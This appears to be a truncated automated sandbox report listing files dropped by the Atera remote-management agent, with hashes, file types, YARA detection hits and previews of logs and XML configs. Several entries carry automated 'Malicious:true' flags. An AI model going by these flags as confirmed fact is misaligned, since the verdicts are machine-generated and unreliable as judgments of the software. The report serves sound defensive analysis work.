                                                                                                                                                                                                                                                                                              SHA-512:02193E2983C4BBCD74C178279F19A0691AD3AEB18E4474E43A202BEC7C76BB1DCC9D76744B7AD803FEDD667D88EFE92B445908F3F1FCA87D89FC491042773A9E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):73256
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.953030587257899
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:w784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAsk76nc:w7N1r9KGI04CCAskwc
                                                                                                                                                                                                                                                                                              MD5:252FD342F5758A63A2AD972A89C6AFCB
                                                                                                                                                                                                                                                                                              SHA1:7406EDF1BCF0765C5850578BF0BDE424490A3279
                                                                                                                                                                                                                                                                                              SHA-256:290366591DEB85496FD224748298F7A830587D5B438F519442E34932FD916C04
                                                                                                                                                                                                                                                                                              SHA-512:217800538609CA30957D9EA539DD68A94793EEE2F3121A14CD53D02195495F866FB17CD3414922ABA133FFBA3622FFB7C163E237B14F5D6CDB682EC7E6D1AC49
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4019
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.255342738012416
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:8gDOYIg8OPgFOM3gYgOVOhVWgBNNXzHSxBNN4zPzRlXNzSPeZgg9dSjedcdS4dSC:Vb4oH8afhbZh9A6qA4AAADjAN
                                                                                                                                                                                                                                                                                              MD5:8194759065D93E08EF8CB2774B204096
                                                                                                                                                                                                                                                                                              SHA1:8470603A95C936FF195596ECC586987F7CA38EC7
                                                                                                                                                                                                                                                                                              SHA-256:260647229E0A266CEE9DFC32FFA136D007677A8379CE50C3B6BF32CE6A47E1FF
                                                                                                                                                                                                                                                                                              SHA-512:5304FB8B48FF944AD7F44470FC8C1E74AB44B6CA3E85160F30B92F3C8CD5D0515A26AAF9D5D4071DAD1CF5FD50F9E8754341D9C453ACAEDFCF91521B3A4AF6CD
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\log.txt, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:2025-01-06 06:59:26.7350|ERROR|WindowsWindowedEventLogProvider|Error on retry number 1: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2025-01-06 06:59:27.8600|ERROR|WindowsWindowedEventLogProvider|Error on retry number 2: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2025-01-06 06:59:29.9225|ERROR|WindowsWindowedEventLogProvider|Error on retry number 3: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2025-01-06 06:59:32.9538|ERROR|WindowsWindowedEventLogProvider|Error initializing last processed events, ignoring file, exception: System.IO.FileNotFoundException: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...File name: 'C:\Progr
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 20, database pages 12, cookie 0xb, schema 4, UTF-8, version-valid-for 20
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.9452620593376841
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:Wu5C4OoNSN1eN+5NmrjVZDzWL8OO7QzyO+pP:j5PsveM5kRtzy8OO7QzyO+p
                                                                                                                                                                                                                                                                                              MD5:D1AB2D5B09D56DBAE36C64135F840B0D
                                                                                                                                                                                                                                                                                              SHA1:9D9916968EFE7F24A453BE8EBBF753ACE883437C
                                                                                                                                                                                                                                                                                              SHA-256:0ABBA9240F2D884D1A76423F11A653E95560D097BC61A31E28006850A4513A99
                                                                                                                                                                                                                                                                                              SHA-512:D7754421444C2BD7F6976005C838800109B32B8B24280E4AA24F78F5ABDDFA32C912033FAD16DC15959881DDC566FC018B737123BBD0EA658D1824E5515A2642
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite Rollback Journal
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):8720
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.89533523931921
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:7M+qcFu5C4OZUlFJNGdNGveXXQXN+5NG1Zt:77fu5C4OoNSN1eN+5Nmt
                                                                                                                                                                                                                                                                                              MD5:0790D0AF08DAED4A4F02956089E28A66
                                                                                                                                                                                                                                                                                              SHA1:FC532C2ABB5B2A3F64B07E632C20E488EC0C6246
                                                                                                                                                                                                                                                                                              SHA-256:6C2F1B50E77A9919A4C5042856613354024D6364A64AA27B552BFF9A01135027
                                                                                                                                                                                                                                                                                              SHA-512:40157A7F14A44D8B004DA355A2CB3E9DD80CDF1981EA95E584ABD14B681C8BE2D337A4187B7BEB934EC520B6667D2366EDBFE083B37DB989C0020D1155F6BB57
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1799208
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.520425420963731
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:WuvfmOhyS2RuhV0yGzcuHpRs8ulCfUk+qKuMhUwqPevJ8QNYfjmqBBLbNFEohFYi:hHmUMohVWpu8ul0UkTgNCfyo39
                                                                                                                                                                                                                                                                                              MD5:2DD13A5E8B126E524393BAA28A18AFEC
                                                                                                                                                                                                                                                                                              SHA1:9A0E98BBBDE36C58A717F2E4C7AA63437B08DE13
                                                                                                                                                                                                                                                                                              SHA-256:034E3B1EDE4A4F55BE311F2CD5EA060ED34262E6A55C0A6E9846152874E87A5A
                                                                                                                                                                                                                                                                                              SHA-512:AE4DDF208E62A23648089EE54FCA2B6F5668FD02BB687AED1C899B62620D55249F638441D576B21FD9555776888C7FF8006092E08C77A39C86FE1D07994D6715
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1475624
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.791755112478489
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:US3uuk58wXpQous2GCzbHwGTzsIDQAKub0MBsIFBm5fi/5ATA9NTTPjXWJD8qB:PdwXpQdNVNDQubXyi60jXTW98qB
                                                                                                                                                                                                                                                                                              MD5:1DB9AFF80C0290760E80567C8E55BCDF
                                                                                                                                                                                                                                                                                              SHA1:F609878ECD10C56C11ED80B3C6DC875444543E6D
                                                                                                                                                                                                                                                                                              SHA-256:2F7DADC4BF447B8BB132A7BBC6D5F6FFA560B419E14403B77AAD30734006CBFD
                                                                                                                                                                                                                                                                                              SHA-512:31C55E74016721B084E0A285A17890DA5AC703C17BC346CE59346E291F03B833C12B8429AF6794D2F16DE203F912C1D88D54B666B5904270A5F4DD21E848CB79
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2950671
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.998749206513446
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:49152:Zzp6la8mL4UI0EpZQScJrHOmsBGxL16A5S4GmurSNV6lzb8E4Ow3ntOR1:OI8CVpEUBlltLolrWoznw3to
                                                                                                                                                                                                                                                                                              MD5:AB8D85C093D6F0180BF09EC0F466B78B
                                                                                                                                                                                                                                                                                              SHA1:1DAF355D14D45B1E411F96FA394A98A84C09E53E
                                                                                                                                                                                                                                                                                              SHA-256:D1E08C8DBF3BFC34E3FDFC390D2E7F5B871F95376E7DDA93E3DD0051D580DB40
                                                                                                                                                                                                                                                                                              SHA-512:2882292301E1FB85B410570ECE6CF05F3E89968A02450DBA192A1F97282F1C08ED30819E3D36C524FBA3BAEB6A2C22A10A762C8313E8823C07554B4B975CC00E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:PK..-.....1N.Y..F.........6...AgentPackageOsUpdates/AgentPackageOsUpdates.Common.dll....(r......I?.......'r.......kN.....r].....x.".3.0.......~....j.).[...i....G....[.\..I*...}q...p.(..!./&.ECZ..w]..Z....U|-..8.L..4.N{.3z.......~a..i.........x.....%.r..7...q..W..J....5.W).*\.Q(...;".I.UB.....*.~G......X/>..$C.R.qD.1.........9K...."ER.....Cx@p..`.....<Z.sr.^...G....wr+|....../.Z.^x..r.J?5...3.}....{(^.]...7>..7.#..B..m............M.}.../...B...I....T.n..rx9...(u"....&&..~..s......q.^...!.N6*.if._.bX.....q@HF.....=.(+..U. ..`.t.?.Xq2.\.e..}...b.0|.$.9|....I.......T.....D^.Ux......|.[Z].'.x..d...r.+Xg....&..M$J.=&M.....|n.....M..7.P^.*=$...I,..... b...+..Q.!..v%...D........K.&u.7..T+...\....A.u..\+.p..a.eI.T..{.j.pX..H.#....5Y..Lwl....7.7.....I.'..M.._{...J.$r..mEp.ZC...gFP..q^}....2)..+...35Y.$...M...>p.Nm}e........+4..@%],8..=....1d.9.6........_.S..g9.[.H..X..le......r4.'..[.N+m.v6I(RIh_..,.d.o.e..t.+D..'#u0.dw.v.T......5...'..3
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):29224
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.373827321096345
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:BpWI4FJ1CsZ1pL375SImXkmlkgGIW2W8f8Mn0DpQ8fz0m1NNyb8E9VF6IYijSJI+:vlexZT375i0qvT+b7z1pEpYi606g9U
                                                                                                                                                                                                                                                                                              MD5:7C7EE1A3814D383F682C3FC35779B36A
                                                                                                                                                                                                                                                                                              SHA1:1A1FCA5A7417DA277CB1524B44ECFA58869610F9
                                                                                                                                                                                                                                                                                              SHA-256:7802C8F3F7CBC3AA4F2E0481804149F1C92FFD8BB2AB2437F9E01A7EAFAAFE33
                                                                                                                                                                                                                                                                                              SHA-512:7D50A1BB87B1FA98FBF6D54C1A53CF3C1E682DB334C9AC310442DA6440F084FB9FF32430C7E0C72EBD787905F55810D3C4846CF60A0675C2467D0BF6B53AD719
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2006
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.012466327549389
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:327h+1/gF27RgdSagFsg+w3jdgDSg+CagFPr7:K4Mw9cr7
                                                                                                                                                                                                                                                                                              MD5:DE33D7BC716E96683CCAEC7E3DECC54B
                                                                                                                                                                                                                                                                                              SHA1:6CAC5E2AE17A91F55760F3652DD1D954CFE34848
                                                                                                                                                                                                                                                                                              SHA-256:E9EC2DB29E1A7F44D6FAD976E29627E2EBCC1C9FD1797D56A69106260B70B65D
                                                                                                                                                                                                                                                                                              SHA-512:353BF5BC4E47C7218CD3EECEE83301950FAA7D48644BEA3FE2F47B5AB432D43B466EBCF8E1A1911923EC423D30682A8FA42A3EA878E7D85C8E91EC841543B887
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):201768
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.74845613160659
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:gi5nVoxzGZzezm87EmUQ9XILSWUPH309T1qT2tl/pR3rPd3iqiTjFvd0uhH:nRVICezm8779XI0/YTx/pFLNiqiTjddN
                                                                                                                                                                                                                                                                                              MD5:D0D21E16E57A1A73056EAE228DA1E287
                                                                                                                                                                                                                                                                                              SHA1:AB5A27B1D3D977A7F657D0ACDF047067C625869F
                                                                                                                                                                                                                                                                                              SHA-256:3DB5809F23020F9988D5DB0CF494F014A87B9DC1547CF804AE9D66667505A60C
                                                                                                                                                                                                                                                                                              SHA-512:470BAC3E691525FF6007293BAC32198C0021A1411BA9D069F88F8603189B1617C2265FE6553C1F60EF788E69AFCB8AA790714C59260B7C015A5BE5B149222C48
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1780
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.027025756159462
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3rrL7h+1/gFSagFsg+w327RgdSg+CjdgDt:7r34owoR
                                                                                                                                                                                                                                                                                              MD5:09CDFC3063DEC485A3C48111D5CEE297
                                                                                                                                                                                                                                                                                              SHA1:02CEFEC66B6B2EEE120F97493D438F3B270AB5CA
                                                                                                                                                                                                                                                                                              SHA-256:0ACF70AE533AF7D079F370AB3102B9563CA4C447C5DFC7A20C88AABE04295C01
                                                                                                                                                                                                                                                                                              SHA-512:CA39056F79EFC8CE050FCCE1AAC21B2E7B62E65A0521E3CABF90C58A7249107658C2D208706FEC456CCC74D58DCDC22E23ECBAA43684613D4826505A426E1CB7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <depend
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.418295834054489
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhWA:Wp
                                                                                                                                                                                                                                                                                              MD5:9A5E9A329E4E73E0C499371205A810DB
                                                                                                                                                                                                                                                                                              SHA1:5B6D85657D4ACD89867283FBE372E9E85C30686F
                                                                                                                                                                                                                                                                                              SHA-256:D109087C4CA318CAD74B7560C32594D37181885ADBDC9348BA1DD35D47B35B92
                                                                                                                                                                                                                                                                                              SHA-512:02BD5261B9E795ED5A07BADD65A6CF71D18751452FB44BDD424DFCC6C50BA7441E0066B125E731018FD6F1A8A002AC4E6961C7EFF21C36FBDA58C8015A100C43
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=30.3
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):102440
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1906245131779745
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:pPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OLv476sy:p2bYbYSWd85I5sSakFQhHLv4m
                                                                                                                                                                                                                                                                                              MD5:D33CE12A25C2675057480654E98ACDC5
                                                                                                                                                                                                                                                                                              SHA1:71F6AFF63988BC9FC9E8D08DBD0151F62E6A8647
                                                                                                                                                                                                                                                                                              SHA-256:F188D7C9B9C35462C556CF87A6F0880B5BAF395CE255F57076CF9AC8DC0E1A2A
                                                                                                                                                                                                                                                                                              SHA-512:DBD65A27A33AC5C3507716E89AE40413B4C2AAC3BE7415977E9447FD89FB7164B7DCB6A8B8974434AE04A7A6917DB32810F1E278EEAD2590C327E30B9A125D1A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):95272
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.9964164933276605
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:A4aRSNSrXS5EaKoDMsUVl0HAWMco2bJkjUB76654:A4auS7S5Ea6WMcpuUBL4
                                                                                                                                                                                                                                                                                              MD5:FB232BA20FACFAD72C87477E1B2B3D72
                                                                                                                                                                                                                                                                                              SHA1:1DFB6577FE0E2E2C60D3848AC588E94F7D93EAB5
                                                                                                                                                                                                                                                                                              SHA-256:828092942C6967EBBAA62BB4F0AEDAAA97522888B59D9DDF708CB863B9D2075C
                                                                                                                                                                                                                                                                                              SHA-512:EC546864F910B72A2723B60C3FA580F6CAE753E623EBE90884B70EBF93E8B511028B355E03F3282D8C5FBC82B6E128FD0893046103DECE289BD371730BA31C53
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16424
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.656724826773557
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:aXh+/DtY2PLNyby2sE9jBF6IYiYF85S35IVnxGUHFeFlWNZrO:aXh+tY2jNyb8E9VF6IYijSJIVxaFatO
                                                                                                                                                                                                                                                                                              MD5:B1224C51F1E9A789EE35AD5218220D2B
                                                                                                                                                                                                                                                                                              SHA1:78043C5AE8AF03B893A4A7C28AB47566A0764B1E
                                                                                                                                                                                                                                                                                              SHA-256:662723280B3F78040BB1DAA661F41AC4D5C5361827273541B569F0B5D1602125
                                                                                                                                                                                                                                                                                              SHA-512:46735609B77A36745CA0BBB353FA1DFE2294382F7F96562C84CE30751D8340C184E62B1FA0DACB2483F5A62166A691CD1A547D2310F9DAE01C3423BF1267E47D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):75304
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.241390537473756
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Hu2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrYA:OF+qo7mDEwj4NXLGcfgruFcaD76jZ
                                                                                                                                                                                                                                                                                              MD5:7EB99AA11E05B3EFA0F65A4435FFB315
                                                                                                                                                                                                                                                                                              SHA1:F07773C71BDB5769667B38E531AF58F64445F74B
                                                                                                                                                                                                                                                                                              SHA-256:0AB86983F01493D5B8297A99BAB27CBF097A4FF68384C1A039DC8B1B0C302C17
                                                                                                                                                                                                                                                                                              SHA-512:6E79E621D2893FB51933BEA95376B40CBBDA947B74A2AF7604166C821D6E8CD98BC357DD8DC16E250E7176D0DA7E19AA3D4702D4149E4215F0BF6D38A9CEBDAE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):51752
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.405565171295978
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:ZQMnMYnUFMSptE7C+t2RO3neZN8752vwzE8Kku6ZFMLcyXXEpYi60k:Z9MYn1seLE8JFMLcyXQ76h
                                                                                                                                                                                                                                                                                              MD5:11AA54E91257EA281D455DB6B77811B9
                                                                                                                                                                                                                                                                                              SHA1:13734726D6CB87F3A02E78A2C68FC2A35CAC9B24
                                                                                                                                                                                                                                                                                              SHA-256:63E84943E0173957D2B3869CE2E0134359FB36F5DCCEE1B8A9B1029071039D2D
                                                                                                                                                                                                                                                                                              SHA-512:2539F92E62CD67EAB842E5A982A9611B0828D547D18BE30DD8A69FA7841D629AE9E9589A41A36D472A9E68DC7CA1E063A8CE4A9D526B5266B7BB1BB5FFC4FA3C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):145448
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.203592588382526
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:zRdbKQx0YYK8gwbUEA5xZs0vVV2yzlhXhYThkyFqhtuElLVwkVJe5K+Q7P6IlIhO:t9XeDmzV2yzlhKLFU1lLVp1+2flYFnQb
                                                                                                                                                                                                                                                                                              MD5:C0DF597621C8B37AF65BB61DE0C42AFF
                                                                                                                                                                                                                                                                                              SHA1:7676065361D8822586F8A2E06C5D6BDDD23A3EEC
                                                                                                                                                                                                                                                                                              SHA-256:F616623B4CC8999F0DCADC73F98BCC4289EC90CDFA0749EACB3FE2F0401AB474
                                                                                                                                                                                                                                                                                              SHA-512:4F43937B440B23145F0A87295AECF7160118D71BCD1A0D2650FC025C7A630F5AEA773A28593F77C67A8C2C55FDA7299BA3F0C09BDAA4532FDAE9FF88C673B393
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):96296
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.6334365923289385
